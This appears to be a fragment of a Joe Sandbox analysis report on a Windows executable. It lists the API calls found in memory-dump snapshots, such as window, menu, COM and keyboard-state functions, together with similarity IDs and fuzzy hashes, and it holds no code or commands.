                                                                                                                                                                                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                    • API String ID: 323675364-22481851
                                                                                                                                                                                                                                                                                    • Opcode ID: 76344c96ae1f14d8e9d1d9ee46cf1d86a97b154420bbab452265339e902bdf8e
                                                                                                                                                                                                                                                                                    • Instruction ID: 74ae590ae095d9111f6707873a6272f5cc4995e65e8eeff549b0c29621766fd9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76344c96ae1f14d8e9d1d9ee46cf1d86a97b154420bbab452265339e902bdf8e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6410672C10269ABCF11EBA4DD95DEEB7B8FF18750F044569E905B31A0EB319E44CB60
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B74AD9
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00B74AE0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B74AF3
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00B74AFB
                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B74B06
                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00B74B10
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 00B74B1A
                                                                                                                                                                                                                                                                                    • SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00B74B30
                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00B74B3C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                    • API String ID: 2559357485-2160076837
                                                                                                                                                                                                                                                                                    • Opcode ID: c22eaeb68bf02ad10cc2b86e79b83f30118c9c4a0c82305ad8180a53fa741197
                                                                                                                                                                                                                                                                                    • Instruction ID: 56aefd7412b46436687b4682891495b0069c92d3111bb3cc8a1da58139399112
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c22eaeb68bf02ad10cc2b86e79b83f30118c9c4a0c82305ad8180a53fa741197
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7315A32140215ABDF129FA4DC08FDA3BB9FF0D365F114251FA29A61A0CB75DC60DBA4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B646B9
                                                                                                                                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 00B646E7
                                                                                                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00B646F1
                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00B6478A
                                                                                                                                                                                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00B6480E
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00B64932
                                                                                                                                                                                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00B6496B
                                                                                                                                                                                                                                                                                    • CoGetObject.OLE32(?,00000000,00B80B64,?), ref: 00B6498A
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 00B6499D
                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00B64A21
                                                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B64A35
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: 1ebd55aef94f3e81000eead2445fb60282c20773a1947127cafe195de1da33d8
• Instruction ID: 6cdadc4a4695523821548fb4b31e1e8068472a36b01d51e5482e5593cbdaf433
• Opcode Fuzzy Hash: 1ebd55aef94f3e81000eead2445fb60282c20773a1947127cafe195de1da33d8
• Instruction Fuzzy Hash: EDC15671608701AFC700DF68C88492BBBE9FF89748F10499DF98A9B260DB34ED45CB52
APIs
• CoInitialize.OLE32(00000000), ref: 00B58538
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B585D4
• SHGetDesktopFolder.SHELL32(?), ref: 00B585E8
• CoCreateInstance.OLE32(00B80CD4,00000000,00000001,00BA7E8C,?), ref: 00B58634
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B586B9
• CoTaskMemFree.OLE32(?,?), ref: 00B58711
• SHBrowseForFolderW.SHELL32(?), ref: 00B5879C
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B587BF
• CoTaskMemFree.OLE32(00000000), ref: 00B587C6
• CoTaskMemFree.OLE32(00000000), ref: 00B5881B
• CoUninitialize.OLE32 ref: 00B58821
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
• String ID:
• API String ID: 2762341140-0
• Opcode ID: 3d86401256621572b27be03157ba912fce60b48c80704f7d44e77cb8df0e80ee
• Instruction ID: 977b2fa0a20396c77dfd2c4b6e1aace2aefd7b64bd827945b9449933b2916a9b
• Opcode Fuzzy Hash: 3d86401256621572b27be03157ba912fce60b48c80704f7d44e77cb8df0e80ee
• Instruction Fuzzy Hash: 18C10C75A00105AFCB14DFA5C888DAEBBF5FF48345B1485D8E81AAB361DB30ED45CB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00B4039F
• SafeArrayAllocData.OLEAUT32(?), ref: 00B403F8
• VariantInit.OLEAUT32(?), ref: 00B4040A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00B4042A
• VariantCopy.OLEAUT32(?,?), ref: 00B4047D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00B40491
• VariantClear.OLEAUT32(?), ref: 00B404A6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00B404B3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B404BC
• VariantClear.OLEAUT32(?), ref: 00B404CE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B404D9
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: ded3639662cc6c94a02eebfd80db74e87ceffd14f1ad0c6f9aabf4d31ad43abb
• Instruction ID: 65bab9d43739812634fddeb0e0678dd12751acea3e4f333fc1dbb3b8d2ce71d2
• Opcode Fuzzy Hash: ded3639662cc6c94a02eebfd80db74e87ceffd14f1ad0c6f9aabf4d31ad43abb
• Instruction Fuzzy Hash: E6417435A00219DFCF10EFA4D8489AE7BB9FF48354F008465FA19A7361CB34AA45DFA0
APIs
• GetKeyboardState.USER32(?), ref: 00B4A65D
• GetAsyncKeyState.USER32(000000A0), ref: 00B4A6DE
• GetKeyState.USER32(000000A0), ref: 00B4A6F9
• GetAsyncKeyState.USER32(000000A1), ref: 00B4A713
• GetKeyState.USER32(000000A1), ref: 00B4A728
• GetAsyncKeyState.USER32(00000011), ref: 00B4A740
• GetKeyState.USER32(00000011), ref: 00B4A752
• GetAsyncKeyState.USER32(00000012), ref: 00B4A76A
• GetKeyState.USER32(00000012), ref: 00B4A77C
• GetAsyncKeyState.USER32(0000005B), ref: 00B4A794
• GetKeyState.USER32(0000005B), ref: 00B4A7A6
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: c251dc2af1707c20b1a8b5793f057a69d0c0593f4f8e4b56d44d80c325c03286
• Instruction ID: 8e3daf77185ab7e34c2874beac0e965cfee62f1f303b995594c7613a03884c62
• Opcode Fuzzy Hash: c251dc2af1707c20b1a8b5793f057a69d0c0593f4f8e4b56d44d80c325c03286
• Instruction Fuzzy Hash: 554194645847C96AFF31966488443A5BEF0EF21348F0880D9D5C65B5C2EBA49FC8D7A3
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                                                                    • API String ID: 707087890-567219261
                                                                                                                                                                                                                                                                                    • Opcode ID: 778e1fcec4f52e7c3f65a3ffb431906996fee0b7b5cfbe5d4d6ec3021707ac68
                                                                                                                                                                                                                                                                                    • Instruction ID: 136b6ae470b5da2e3683caef34b147b1a1e4ad096ee440e0899ae48f3210861f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 778e1fcec4f52e7c3f65a3ffb431906996fee0b7b5cfbe5d4d6ec3021707ac68
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5951C332A041169BCF14DF6CC9909BEB7E9FF65360B2042A9E826E72C4DB39DD41C790
APIs
• CoInitialize.OLE32 ref: 00B641D1
• CoUninitialize.OLE32 ref: 00B641DC
• CoCreateInstance.OLE32(?,00000000,00000017,00B80B44,?), ref: 00B64236
• IIDFromString.OLE32(?,?), ref: 00B642A9
• VariantInit.OLEAUT32(?), ref: 00B64341
• VariantClear.OLEAUT32(?), ref: 00B64393
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 636576611-1287834457
• Opcode ID: afcbc12211b1c620d9a85a8e740f6c4fe418c58c2d11cffd561fa7a304fbb1fc
• Instruction ID: 9d443b408b7ec7ae64c0319e3560252280c5ce4cc15e02a387b1215c7ead4752
• Opcode Fuzzy Hash: afcbc12211b1c620d9a85a8e740f6c4fe418c58c2d11cffd561fa7a304fbb1fc
• Instruction Fuzzy Hash: 5061B171608B01DFC310DF64D888F6ABBE4EF49714F104999F9859B2A1DB74ED48CB92
APIs
• GetLocalTime.KERNEL32(?), ref: 00B58C9C
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00B58CAC
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B58CB8
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B58D55
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B58D69
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B58D9B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B58DD1
• SetCurrentDirectoryW.KERNEL32(?), ref: 00B58DDA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local$System
• String ID: *.*
• API String ID: 1464919966-438819550
• Opcode ID: 970dfe9a7a68487d46eb23011b73f050db596a172fe37e933946084277657971
• Instruction ID: 4395fa2a843f0d7b50e527009e4e14599eef5cd7c54d67f03841dfd1efd50fc5
• Opcode Fuzzy Hash: 970dfe9a7a68487d46eb23011b73f050db596a172fe37e933946084277657971
• Instruction Fuzzy Hash: F4615B725043459FCB10EF60C844AAEB7F8FF99310F0449ADF99997291DB31EA49CB92
APIs
• CreateMenu.USER32 ref: 00B74715
• SetMenu.USER32(?,00000000), ref: 00B74724
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B747AC
• IsMenu.USER32(?), ref: 00B747C0
• CreatePopupMenu.USER32 ref: 00B747CA
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B747F7
• DrawMenuBar.USER32 ref: 00B747FF
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Menu$CreateItem$DrawInfoInsertPopup
• String ID: 0$F
• API String ID: 161812096-3044882817
• Opcode ID: d1a3941b0a7895da02a53e29ef0529ec3440536b0b4c7c1998936ddcc2d24f9f
• Instruction ID: 1c621edf5eb89b7e60ff57f7c0a9cbf53f5e1644cfc180eadbdc612553456d76
• Opcode Fuzzy Hash: d1a3941b0a7895da02a53e29ef0529ec3440536b0b4c7c1998936ddcc2d24f9f
• Instruction Fuzzy Hash: 03419A74A01209EFDB14CF64D884EAA7BF5FF09315F148068FA59A7360CB70AD10CB50
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
• SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00B428B1
• GetDlgCtrlID.USER32 ref: 00B428BC
• GetParent.USER32 ref: 00B428D8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00B428DB
• GetDlgCtrlID.USER32(?), ref: 00B428E4
• GetParent.USER32(?), ref: 00B428F8
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00B428FB
Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                    • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                                                                    • Opcode ID: 79ea2331d99b201785ce1e2e1ca6b8e8403c540010e2d1d4041fc46906007a3b
                                                                                                                                                                                                                                                                                    • Instruction ID: 350668416f201c599885f19ffac48aad9666731f11cb584b1aec7ee8dc5e5dbb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79ea2331d99b201785ce1e2e1ca6b8e8403c540010e2d1d4041fc46906007a3b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0821F974D00118BFCF05AFA4CC85EEEBBB4EF05350F400196F961A72A1DB754958EB60
APIs
  • Part of subcall function 00AEB329: _wcslen.LIBCMT ref: 00AEB333
  • Part of subcall function 00B445FD: GetClassNameW.USER32(?,?,000000FF), ref: 00B44620
• SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00B42990
• GetDlgCtrlID.USER32 ref: 00B4299B
• GetParent.USER32 ref: 00B429B7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00B429BA
• GetDlgCtrlID.USER32(?), ref: 00B429C3
• GetParent.USER32(?), ref: 00B429D7
• SendMessageW.USER32(00000000,?,00000111,?), ref: 00B429DA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$CtrlParent$ClassName_wcslen
• String ID: ComboBox$ListBox
• API String ID: 711023334-1403004172
• Opcode ID: eb74f40978c6bd2948f43a04da87f5120410b403418dcbe3690925cfe8785441
• Instruction ID: fb5dbf8e94bc0e0a0674a1eadbcc4a41821e601a4b429c11b9e14e5903f50b21
• Opcode Fuzzy Hash: eb74f40978c6bd2948f43a04da87f5120410b403418dcbe3690925cfe8785441
• Instruction Fuzzy Hash: A821F375E00218BBCF05AFA4CC86EEEBBB8EF05340F404096B951A71A1DB758958EB60
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B74539
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B7453C
• GetWindowLongW.USER32(?,000000F0), ref: 00B74563
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B74586
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B745FE
• SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00B74648
• SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00B74663
• SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00B7467E
• SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00B74692
• SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00B746AF
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: MessageSend$LongWindow
• String ID:
• API String ID: 312131281-0
• Opcode ID: 501355cb2d39eef5a8872a352bb54129503a882b23c585a8daba43976bcb9c43
• Instruction ID: 40ff1e0456b1923614227d17bcb6def7d7f6bfa19ea30187bde7a2646457f983
• Opcode Fuzzy Hash: 501355cb2d39eef5a8872a352bb54129503a882b23c585a8daba43976bcb9c43
• Instruction Fuzzy Hash: 33616B75A00208AFDB11DFA8CC85EEE77F8EF09710F1041A9FA19E72A1D7B4A945DB50
APIs
• GetCurrentThreadId.KERNEL32 ref: 00B4BB18
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB2C
• GetWindowThreadProcessId.USER32(00000000), ref: 00B4BB33
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB42
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00B4BB54
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB6D
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BB7F
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BBC4
• AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BBD9
• AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00B4ABA8,?,00000001), ref: 00B4BBE4
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 4a0c5d6c31f70808330e343f6a99c6c406e8eb83e52c278b54b8c34a02d37666
                                                                                                                                                                                                                                                                                    • Instruction ID: 1cd858f38db1048d390a6b31214511e66fb47e6e05cce2347c293c9eb5f479db
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a0c5d6c31f70808330e343f6a99c6c406e8eb83e52c278b54b8c34a02d37666
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC318C72A04604BFDB11AF24DC88F6977F9FF49352F504145FB0A971A4DBB4DA809B20
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13007
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4), ref: 00B12D4E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00B12D38: GetLastError.KERNEL32(00BB1DC4,?,00B1DB51,00BB1DC4,00000000,00BB1DC4,00000000,?,00B1DB78,00BB1DC4,00000007,00BB1DC4,?,00B1DF75,00BB1DC4,00BB1DC4), ref: 00B12D60
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B13013
                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00B1301E
